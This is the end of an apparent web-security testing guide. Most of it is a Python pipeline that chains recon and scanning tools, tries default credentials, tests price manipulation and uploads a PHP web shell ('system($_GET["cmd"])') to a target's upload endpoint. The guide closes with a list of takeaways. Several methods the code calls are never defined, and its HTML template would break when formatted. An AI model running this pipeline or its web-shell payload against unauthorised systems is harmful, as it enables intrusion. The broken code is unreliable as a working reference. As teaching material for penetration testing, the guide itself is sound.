"""
import subprocess
import json
import yaml
import xml.etree.ElementTree as ET
from pathlib import Path
from datetime import datetime
import concurrent.futures
import time
import requests
import sys
class SecurityTestingPipeline:
def __init__(self, target, config_file=None):
self.target = target
self.config = self.load_config(config_file)
self.results = {}
self.report = {}
def load_config(self, config_file):
"""Load pipeline configuration"""
default_config = {
'scan_types': {
'reconnaissance': True,
'vulnerability_scanning': True,
'authentication_testing': True,
'api_testing': True,
'business_logic': True,
'reporting': True
},
'tools': {
'nmap': {
'enabled': True,
'ports': '1-1000',
'scripts': ['vuln', 'safe', 'discovery']
},
'nikto': {
'enabled': True,
'timeout': 300
},
'sqlmap': {
'enabled': True,
'risk': 1,
'level': 1
},
'zap': {
'enabled': True,
'mode': 'full'
},
'custom_tests': {
'enabled': True
}
},
'reporting': {
'format': ['html', 'json', 'pdf'],
'output_dir': './reports'
}
}
if config_file:
with open(config_file) as f:
user_config = yaml.safe_load(f)
# Merge with default config
default_config.update(user_config)
return default_config
def run_pipeline(self):
"""Run the complete security testing pipeline"""
print(f"[*] Starting security testing pipeline for {self.target}")
print(f"[*] Start time: {datetime.now()}")
pipeline_steps = [
('Initialization', self.initialize_pipeline),
('Reconnaissance', self.run_reconnaissance),
('Vulnerability Scanning', self.run_vulnerability_scanning),
('Authentication Testing', self.run_authentication_testing),
('API Testing', self.run_api_testing),
('Business Logic Testing', self.run_business_logic_tests),
('Custom Tests', self.run_custom_tests),
('Reporting', self.generate_report)
]
for step_name, step_func in pipeline_steps:
if self.should_run_step(step_name):
print(f"\n[*] Running step: {step_name}")
try:
result = step_func()
self.results[step_name] = result
print(f"[+] {step_name} completed successfully")
except Exception as e:
print(f"[-] {step_name} failed: {e}")
self.results[step_name] = {'error': str(e)}
print(f"\n[*] Pipeline completed at {datetime.now()}")
return self.results
def should_run_step(self, step_name):
"""Check if step should run based on configuration"""
step_mapping = {
'Reconnaissance': 'reconnaissance',
'Vulnerability Scanning': 'vulnerability_scanning',
'Authentication Testing': 'authentication_testing',
'API Testing': 'api_testing',
'Business Logic Testing': 'business_logic',
'Reporting': 'reporting'
}
if step_name in step_mapping:
return self.config['scan_types'].get(step_mapping[step_name], True)
return True
def initialize_pipeline(self):
"""Initialize the testing pipeline"""
# Create output directory
output_dir = Path(self.config['reporting']['output_dir'])
output_dir.mkdir(parents=True, exist_ok=True)
# Create session file
session_data = {
'target': self.target,
'start_time': datetime.now().isoformat(),
'config': self.config
}
session_file = output_dir / 'session.json'
with open(session_file, 'w') as f:
json.dump(session_data, f, indent=2)
return {'status': 'initialized', 'session_file': str(session_file)}
def run_reconnaissance(self):
"""Run reconnaissance phase"""
recon_results = {}
# 1. Nmap scan
if self.config['tools']['nmap']['enabled']:
print("[*] Running Nmap scan...")
nmap_result = self.run_nmap_scan()
recon_results['nmap'] = nmap_result
# 2. Directory enumeration
print("[*] Running directory enumeration...")
dir_result = self.run_directory_enumeration()
recon_results['directory_enumeration'] = dir_result
# 3. Subdomain enumeration
print("[*] Running subdomain enumeration...")
subdomain_result = self.run_subdomain_enumeration()
recon_results['subdomain_enumeration'] = subdomain_result
# 4. Technology detection
print("[*] Detecting technologies...")
tech_result = self.detect_technologies()
recon_results['technology_detection'] = tech_result
return recon_results
def run_nmap_scan(self):
"""Run Nmap scan"""
ports = self.config['tools']['nmap']['ports']
scripts = self.config['tools']['nmap']['scripts']
cmd = ['nmap', '-sV', '-sC', '-p', ports, '-oA', 'nmap_scan', self.target]
# Add scripts if specified
if scripts:
for script in scripts:
cmd.extend(['--script', script])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
# Parse Nmap output
parsed_results = self.parse_nmap_output(result.stdout)
return {
'command': ' '.join(cmd),
'returncode': result.returncode,
'stdout': result.stdout[:1000],
'parsed_results': parsed_results
}
except subprocess.TimeoutExpired:
return {'error': 'Nmap scan timed out after 10 minutes'}
except Exception as e:
return {'error': str(e)}
def parse_nmap_output(self, nmap_output):
"""Parse Nmap output into structured data"""
parsed = {
'open_ports': [],
'services': [],
'vulnerabilities': []
}
# Simple parsing - in reality, use nmap parser library
lines = nmap_output.split('\n')
for line in lines:
if '/tcp' in line or '/udp' in line:
# Port line: 80/tcp open http
parts = line.split()
if len(parts) >= 3:
port_proto = parts[0]
state = parts[1]
service = parts[2] if len(parts) > 2 else 'unknown'
parsed['open_ports'].append({
'port': port_proto,
'state': state,
'service': service
})
return parsed
def run_directory_enumeration(self):
"""Run directory enumeration"""
tools = ['gobuster', 'ffuf', 'dirb']
dir_results = {}
for tool in tools:
try:
if tool == 'gobuster':
cmd = ['gobuster', 'dir', '-u', self.target, '-w',
'/usr/share/wordlists/dirb/common.txt', '-t', '50']
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
dir_results['gobuster'] = self.parse_gobuster_output(result.stdout)
elif tool == 'ffuf':
cmd = ['ffuf', '-u', f'{self.target}/FUZZ', '-w',
'/usr/share/wordlists/dirb/common.txt', '-t', '50']
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
dir_results['ffuf'] = self.parse_ffuf_output(result.stdout)
except Exception as e:
dir_results[tool] = {'error': str(e)}
return dir_results
def run_subdomain_enumeration(self):
"""Run subdomain enumeration"""
# Extract domain from target
from urllib.parse import urlparse
parsed = urlparse(self.target)
domain = parsed.netloc or parsed.path
# Remove port if present
if ':' in domain:
domain = domain.split(':')[0]
subdomain_results = {}
try:
# Use subfinder if available
cmd = ['subfinder', '-d', domain, '-silent']
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
subdomains = result.stdout.strip().split('\n')
subdomain_results['subfinder'] = {
'domain': domain,
'subdomains_found': len(subdomains),
'subdomains': subdomains[:10] # First 10
}
except Exception as e:
subdomain_results['error'] = str(e)
return subdomain_results
def detect_technologies(self):
"""Detect web technologies"""
tech_results = {}
try:
# Use Wappalyzer or WhatWeb
cmd = ['whatweb', '-a', '3', self.target]
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
# Parse WhatWeb output
tech_results['whatweb'] = self.parse_whatweb_output(result.stdout)
except Exception as e:
tech_results['error'] = str(e)
return tech_results
def run_vulnerability_scanning(self):
"""Run vulnerability scanning"""
vuln_results = {}
# 1. Nikto scan
if self.config['tools']['nikto']['enabled']:
print("[*] Running Nikto scan...")
nikto_result = self.run_nikto_scan()
vuln_results['nikto'] = nikto_result
# 2. SQLMap scan (if SQLi suspected)
if self.config['tools']['sqlmap']['enabled']:
print("[*] Running SQLMap scan...")
sqlmap_result = self.run_sqlmap_scan()
vuln_results['sqlmap'] = sqlmap_result
# 3. OWASP ZAP scan
if self.config['tools']['zap']['enabled']:
print("[*] Running OWASP ZAP scan...")
zap_result = self.run_zap_scan()
vuln_results['zap'] = zap_result
return vuln_results
def run_nikto_scan(self):
"""Run Nikto vulnerability scanner"""
timeout = self.config['tools']['nikto']['timeout']
cmd = ['nikto', '-h', self.target, '-o', 'nikto_report.html', '-Format', 'html']
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
# Parse Nikto output
vulnerabilities = self.parse_nikto_output(result.stdout)
return {
'command': ' '.join(cmd),
'returncode': result.returncode,
'vulnerabilities_found': len(vulnerabilities),
'vulnerabilities': vulnerabilities[:5] # First 5
}
except subprocess.TimeoutExpired:
return {'error': f'Nikto scan timed out after {timeout} seconds'}
except Exception as e:
return {'error': str(e)}
def run_sqlmap_scan(self):
"""Run SQLMap scanner"""
risk = self.config['tools']['sqlmap']['risk']
level = self.config['tools']['sqlmap']['level']
# Test a common parameter
test_url = f"{self.target}?id=1"
cmd = ['sqlmap', '-u', test_url, '--batch', '--risk', str(risk),
'--level', str(level), '--flush-session']
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
# Parse SQLMap output
sqlmap_result = self.parse_sqlmap_output(result.stdout)
return {
'command': ' '.join(cmd),
'returncode': result.returncode,
'result': sqlmap_result
}
except subprocess.TimeoutExpired:
return {'error': 'SQLMap scan timed out after 10 minutes'}
except Exception as e:
return {'error': str(e)}
def run_zap_scan(self):
"""Run OWASP ZAP scan"""
mode = self.config['tools']['zap']['mode']
# ZAP requires different setup
# For this example, we'll simulate
zap_result = {
'status': 'simulated',
'note': 'In production, integrate with ZAP API',
'vulnerabilities': [
{'type': 'XSS', 'severity': 'High', 'url': f'{self.target}/search?q=<script>'},
{'type': 'CSRF', 'severity': 'Medium', 'url': f'{self.target}/profile'},
{'type': 'Information Disclosure', 'severity': 'Low', 'url': f'{self.target}/debug'}
]
}
return zap_result
def run_authentication_testing(self):
"""Run authentication testing"""
auth_results = {}
# Test common authentication weaknesses
tests = [
self.test_default_credentials,
self.test_weak_passwords,
self.test_password_reset,
self.test_session_management
]
with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
future_to_test = {executor.submit(test): test.__name__ for test in tests}
for future in concurrent.futures.as_completed(future_to_test):
test_name = future_to_test[future]
try:
result = future.result()
auth_results[test_name] = result
except Exception as e:
auth_results[test_name] = {'error': str(e)}
return auth_results
def test_default_credentials(self):
"""Test for default credentials"""
# Common default credentials
defaults = [
('admin', 'admin'),
('admin', 'password'),
('admin', '123456'),
('root', 'root'),
('test', 'test'),
('guest', 'guest')
]
login_url = f"{self.target}/login"
results = []
for username, password in defaults[:3]: # Test first 3
try:
response = requests.post(
login_url,
data={'username': username, 'password': password},
timeout=5
)
if response.status_code == 200 and 'login' not in response.text.lower():
results.append({
'username': username,
'password': password,
'status': 'SUCCESS',
'evidence': 'Default credentials accepted'
})
else:
results.append({
'username': username,
'password': password,
'status': 'FAILED'
})
except Exception as e:
results.append({'error': str(e)})
return results
def test_weak_passwords(self):
"""Test for weak password policy"""
# Test if weak passwords are accepted
weak_passwords = [
'password',
'123456',
'qwerty',
'letmein',
'welcome'
]
register_url = f"{self.target}/register"
results = []
for password in weak_passwords[:2]: # Test first 2
try:
response = requests.post(
register_url,
json={
'username': f'test_{int(time.time())}',
'password': password,
'email': f'test{int(time.time())}@example.com'
},
timeout=5
)
if response.status_code == 200:
results.append({
'password': password,
'status': 'ACCEPTED',
'evidence': 'Weak password accepted during registration'
})
else:
results.append({
'password': password,
'status': 'REJECTED'
})
except Exception as e:
results.append({'error': str(e)})
return results
def run_api_testing(self):
"""Run API security testing"""
api_results = {}
# Discover API endpoints
endpoints = self.discover_api_endpoints()
api_results['endpoints'] = endpoints
# Test each endpoint
tests = [
self.test_api_authentication,
self.test_api_rate_limiting,
self.test_api_input_validation
]
for test in tests:
test_name = test.__name__
try:
result = test()
api_results[test_name] = result
except Exception as e:
api_results[test_name] = {'error': str(e)}
return api_results
def discover_api_endpoints(self):
"""Discover API endpoints"""
endpoints = []
# Common API paths
common_paths = [
'/api',
'/api/v1',
'/api/v2',
'/graphql',
'/rest',
'/soap'
]
for path in common_paths:
url = f"{self.target}{path}"
try:
response = requests.get(url, timeout=5)
if response.status_code != 404:
endpoints.append({
'path': path,
'status_code': response.status_code,
'content_type': response.headers.get('Content-Type', '')
})
except:
pass
return endpoints
def run_business_logic_tests(self):
"""Run business logic tests"""
logic_results = {}
tests = [
self.test_price_manipulation,
self.test_quantity_manipulation,
self.test_workflow_bypass
]
for test in tests:
test_name = test.__name__
try:
result = test()
logic_results[test_name] = result
except Exception as e:
logic_results[test_name] = {'error': str(e)}
return logic_results
def test_price_manipulation(self):
"""Test for price manipulation vulnerabilities"""
# Try to change price in cart/checkout
cart_url = f"{self.target}/api/cart"
checkout_url = f"{self.target}/api/checkout"
results = []
# Test 1: Negative price
try:
response = requests.post(
cart_url,
json={'item_id': '123', 'price': -10},
timeout=5
)
if response.status_code == 200:
results.append({
'test': 'negative_price',
'status': 'VULNERABLE',
'evidence': 'Negative price accepted'
})
except:
pass
# Test 2: Very high price
try:
response = requests.post(
checkout_url,
json={'total': 0.01}, # Try to pay 1 cent
timeout=5
)
if response.status_code == 200:
results.append({
'test': 'price_override',
'status': 'VULNERABLE',
'evidence': 'Price override possible'
})
except:
pass
return results
def run_custom_tests(self):
"""Run custom security tests"""
custom_results = {}
# Add custom tests here based on application
custom_tests = [
self.test_file_upload,
self.test_xxe,
self.test_ssrf
]
for test in custom_tests:
test_name = test.__name__
try:
result = test()
custom_results[test_name] = result
except Exception as e:
custom_results[test_name] = {'error': str(e)}
return custom_results
def test_file_upload(self):
"""Test file upload vulnerabilities"""
upload_url = f"{self.target}/upload"
results = []
# Test dangerous file types
dangerous_files = [
('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
('shell.jsp', '<%@ page import="java.util.*" %>', 'application/jsp'),
('shell.asp', '<% Response.Write("Hello") %>', 'application/asp'),
]
for filename, content, content_type in dangerous_files[:1]: # Test first
files = {'file': (filename, content, content_type)}
try:
response = requests.post(upload_url, files=files, timeout=5)
if response.status_code == 200:
# Check if file was uploaded
if 'upload' in response.text.lower() or 'success' in response.text.lower():
results.append({
'filename': filename,
'status': 'VULNERABLE',
'evidence': f'Dangerous file {filename} uploaded successfully'
})
except:
pass
return results
def generate_report(self):
"""Generate comprehensive security report"""
print("[*] Generating security report...")
report = {
'metadata': {
'target': self.target,
'scan_date': datetime.now().isoformat(),
'duration': 'N/A', # Would calculate based on start/end times
'pipeline_version': '1.0'
},
'executive_summary': self.generate_executive_summary(),
'detailed_findings': self.results,
'risk_assessment': self.assess_risk(),
'recommendations': self.generate_recommendations(),
'appendix': {
'tools_used': list(self.config['tools'].keys()),
'scan_configuration': self.config
}
}
# Save report in different formats
output_dir = Path(self.config['reporting']['output_dir'])
if 'json' in self.config['reporting']['format']:
json_file = output_dir / 'security_report.json'
with open(json_file, 'w') as f:
json.dump(report, f, indent=2)
if 'html' in self.config['reporting']['format']:
html_report = self.generate_html_report(report)
html_file = output_dir / 'security_report.html'
with open(html_file, 'w') as f:
f.write(html_report)
self.report = report
return report
def generate_executive_summary(self):
"""Generate executive summary"""
summary = {
'total_findings': 0,
'critical_findings': 0,
'high_findings': 0,
'medium_findings': 0,
'low_findings': 0,
'overall_risk': 'Unknown'
}
# Count findings from different scans
# This would be more sophisticated in reality
return summary
def assess_risk(self):
"""Assess overall risk"""
risk_levels = ['Critical', 'High', 'Medium', 'Low', 'Informational']
# Simple risk assessment
# In reality, this would analyze all findings
return {
'overall_risk': 'Medium',
'confidence': 'Medium',
'factors_considered': ['Vulnerabilities found', 'Data sensitivity', 'Attack surface']
}
def generate_recommendations(self):
"""Generate security recommendations"""
recommendations = {
'immediate': [
'Patch critical vulnerabilities within 24 hours',
'Change default credentials immediately',
'Implement WAF rules for detected attack patterns'
],
'short_term': [
'Complete vulnerability remediation within 7 days',
'Implement security monitoring and alerting',
'Conduct developer security training'
],
'long_term': [
'Implement secure SDLC processes',
'Regular security testing and penetration testing',
'Continuous security monitoring and improvement'
]
}
return recommendations
def generate_html_report(self, report_data):
"""Generate HTML report"""
html_template = """
<!DOCTYPE html>
<html>
<head>
<title>Security Assessment Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
h1 { color: #333; }
h2 { color: #555; border-bottom: 1px solid #ddd; padding-bottom: 10px; }
.critical { color: #d9534f; font-weight: bold; }
.high { color: #f0ad4e; }
.medium { color: #5bc0de; }
.low { color: #5cb85c; }
table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f2f2f2; }
.summary-box { background: #f8f9fa; border: 1px solid #dee2e6; padding: 20px; border-radius: 5px; }
</style>
</head>
<body>
<h1>Security Assessment Report</h1>
<div class="summary-box">
<h2>Executive Summary</h2>
<p><strong>Target:</strong> {target}</p>
<p><strong>Scan Date:</strong> {scan_date}</p>
<p><strong>Overall Risk:</strong> <span class="{risk_class}">{overall_risk}</span></p>
</div>
<h2>Findings Summary</h2>
<table>
<tr>
<th>Severity</th>
<th>Count</th>
</tr>
<tr><td class="critical">Critical</td><td>{critical_count}</td></tr>
<tr><td class="high">High</td><td>{high_count}</td></tr>
<tr><td class="medium">Medium</td><td>{medium_count}</td></tr>
<tr><td class="low">Low</td><td>{low_count}</td></tr>
</table>
<h2>Recommendations</h2>
<h3>Immediate Actions (24 hours)</h3>
<ul>
{immediate_recs}
</ul>
<h3>Short Term Actions (7 days)</h3>
<ul>
{short_term_recs}
</ul>
<h3>Long Term Actions (30+ days)</h3>
<ul>
{long_term_recs}
</ul>
<hr>
<p><em>Report generated by Security Testing Pipeline v1.0</em></p>
</body>
</html>
"""
# Fill template
risk_class = report_data['risk_assessment']['overall_risk'].lower()
filled_html = html_template.format(
target=report_data['metadata']['target'],
scan_date=report_data['metadata']['scan_date'],
overall_risk=report_data['risk_assessment']['overall_risk'],
risk_class=risk_class,
critical_count=report_data['executive_summary']['critical_findings'],
high_count=report_data['executive_summary']['high_findings'],
medium_count=report_data['executive_summary']['medium_findings'],
low_count=report_data['executive_summary']['low_findings'],
immediate_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['immediate']),
short_term_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['short_term']),
long_term_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['long_term'])
)
return filled_html
# Usage
pipeline = SecurityTestingPipeline(
target="http://target.com",
config_file="security_config.yaml" # Optional
)
results = pipeline.run_pipeline()
print(f"\n{'='*60}")
print("SECURITY TESTING PIPELINE COMPLETE")
print(f"{'='*60}")
# Print summary
if 'Reporting' in results and 'report' in results['Reporting']:
report = results['Reporting']['report']
print(f"\nReport generated: {pipeline.config['reporting']['output_dir']}/")
print(f"Overall Risk: {report['risk_assessment']['overall_risk']}")
# Check for critical findings
print(f"\nPipeline Steps Completed:")
for step, result in results.items():
if isinstance(result, dict) and 'error' not in result:
print(f" ✓ {step}")
else:
print(f" ✗ {step} (Error)")
print(f"\n[*] Detailed reports available in {pipeline.config['reporting']['output_dir']}/")This comprehensive guide has covered advanced techniques, tools, and methodologies for testing OWASP Top 10 vulnerabilities. Key takeaways:
- Integrate security testing into CI/CD pipelines
- Use tools like ZAP, Nuclei, and custom scripts
- Implement continuous security monitoring
- Business logic flaws require creative testing
- Race conditions need specialized tools
- SSRF requires multiple bypass techniques
- Understand the application's business purpose
- Test based on risk (sensitive data, functionality)
- Consider the technology stack
- Automated scanning + manual testing
- Static + dynamic analysis
- Black-box + grey-box testing
- New vulnerabilities emerge constantly
- Tools and techniques evolve
- Follow security research and updates
- Implement a Security Testing Pipeline like the one shown in Chapter 11
- Create Custom Tooling for your specific technology stack
- Regularly Update Your Toolkit with new tools and techniques
- Train Your Team on advanced security testing methods
- Establish Metrics to measure security testing effectiveness
Remember: Security testing is an ongoing process, not a one-time event. Regular assessments, combined with proper remediation and monitoring, create a robust security posture.